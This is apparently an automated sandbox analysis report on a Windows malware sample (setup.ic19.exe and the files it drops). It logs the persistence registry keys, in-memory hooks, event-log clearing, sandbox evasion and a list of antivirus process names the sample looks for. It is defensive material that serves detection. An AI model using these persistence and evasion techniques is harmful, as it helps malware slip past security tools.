Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File created: C:\Program Files (x86)\lXAMaI\tbcore3U.dll	Jump to dropped file
Source: C:\Users\user\Desktop\setup.ic19.exe	File created: C:\Users\user\AppData\Roaming\hccutils.dll	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron

Jump to behavior

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

7_2_1000AFA5

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Memory written: PID: 4124 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Memory written: PID: 4124 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Memory written: PID: 4124 base: 7FFE22380005 value: E9 EB D9 E8 FF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Memory written: PID: 4124 base: 7FFE2220D9F0 value: E9 1A 26 17 00	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Memory written: PID: 4452 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Memory written: PID: 4452 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Memory written: PID: 4452 base: 7FFE22380005 value: E9 EB D9 E8 FF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Memory written: PID: 4452 base: 7FFE2220D9F0 value: E9 1A 26 17 00	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 6852 base: 400005 value: E9 8B 2F B0 76	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 6852 base: 76F02F90 value: E9 7A D0 4F 89	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 6852 base: 420005 value: E9 8B 2F AE 76	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 6852 base: 76F02F90 value: E9 7A D0 51 89	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 6672 base: 8E0005 value: E9 8B 2F 62 76	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 6672 base: 76F02F90 value: E9 7A D0 9D 89	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Memory written: PID: 6972 base: 1350005 value: E9 8B 2F BB 75	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Memory written: PID: 6972 base: 76F02F90 value: E9 7A D0 44 8A	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Memory written: PID: 3244 base: 2A10005 value: E9 8B 2F 4F 74	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Memory written: PID: 3244 base: 76F02F90 value: E9 7A D0 B0 8B	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 4412 base: 11A0005 value: E9 8B 2F D6 75	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 4412 base: 76F02F90 value: E9 7A D0 29 8A	Jump to behavior
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Memory written: PID: 3804 base: F10005 value: E9 8B 2F FF 75
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Memory written: PID: 3804 base: 76F02F90 value: E9 7A D0 00 8A
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 5840 base: 13A0005 value: E9 8B 2F B6 75
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Memory written: PID: 5840 base: 76F02F90 value: E9 7A D0 49 8A

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_1001CAA8 IsIconic,GetWindowPlacement,GetWindowRect,

7_2_1001CAA8

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_10004C34 OpenEventLogA,ClearEventLogA,CloseEventLog,

7_2_10004C34

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_1000EC78 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,

7_2_1000EC78

Source: C:\Users\user\Desktop\setup.ic19.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_7-54216
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_7-54216

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C6A87AA
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C76B056
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C65A03F
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C69F34F
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C658B19
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C745F8C
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C7B7912
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 326B4EC
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 31F901D
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 3161E35
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 3192528
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 3221849
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 326785D
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 322FF27
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C761EB4
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C76CBDE
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C7C7C0E
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6BF33E38
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6BF190FC
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6C0582C1
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6C021EB4
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C6EF839
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C7A2F48
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C6FC0AF
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6BFD8647
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6C062F48
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6C066565
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6BF0F12B
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B8F82C1
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B7D3E38
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B8D9F9E
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B77BC04
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B902F48
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B9191B6
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B906565
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B84F839
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C675143
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C6590FC
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C7C8092
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C718647
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B7B90FC
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B7FF34F
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B927C0E
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B81080B
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B8E6E74
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	API/Special instruction interceptor: Address: 6B72DE34
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C7982C1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C61BC04
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C6B2089
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C6A87B1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API/Special instruction interceptor: Address: 6C786E74

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Section loaded: OutputDebugStringW count: 1889

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: lXAMaI.exe, 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR214/212/289/29:;9241POSTDATAC:\USERS\TTRUESPANL.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCE